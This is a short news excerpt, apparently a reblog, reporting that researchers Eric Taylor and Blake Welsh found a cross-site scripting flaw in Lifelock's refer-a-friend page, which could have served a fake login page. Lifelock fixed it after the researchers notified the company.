A vulnerability discovered by security researchers Eric Taylor and Blake Welsh could turn an innocuous “refer-a-friend” page into an official-looking phishing page. By adding encoded HTML to the end of a basic URL, Taylor and his partner were able to simulate a Lifelock login page that could potentially grab usernames and passwords from unsuspecting users.
Lifelock closed the vulnerability, which is called a cross-site scripting attack, after Taylor notified the company. Lifelock has over 3 million customers with revenue of $369.65 million. As of 2010 Lifelock’s CEO Todd Davis has been targeted for identity theft over a dozen times.
As shown in the screenshot above, Taylor was able to simulate a very simple login page by appending a long string of characters to the refer-a-friend URL on Lifelock. The “name” field could in fact contain any data, including joke names or more complex HTML.
“I found it while simply browsing…
View original post 162 more words